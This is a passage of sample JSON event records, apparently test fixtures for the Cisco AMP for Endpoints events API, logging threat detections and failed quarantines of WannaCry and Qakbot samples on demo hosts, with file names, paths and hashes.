Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229322845880000,"timestamp":1610635263,"timestamp_nanoseconds":950000000,"date":"2021-01-14T14:41:03+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qYf.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4191700.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1493058569636000800,"timestamp":1610633340,"timestamp_nanoseconds":636000000,"date":"2021-01-14T14:09:00+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610633340,"start_date":"2021-01-14T14:09:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":611000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":65000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772012435046000,"timestamp":1610631959,"timestamp_nanoseconds":940000000,"date":"2021-01-14T13:45:59+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772012435046402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Unconfirmed 762952.crdownload","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741861","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741861","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":350000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":225000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":210000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 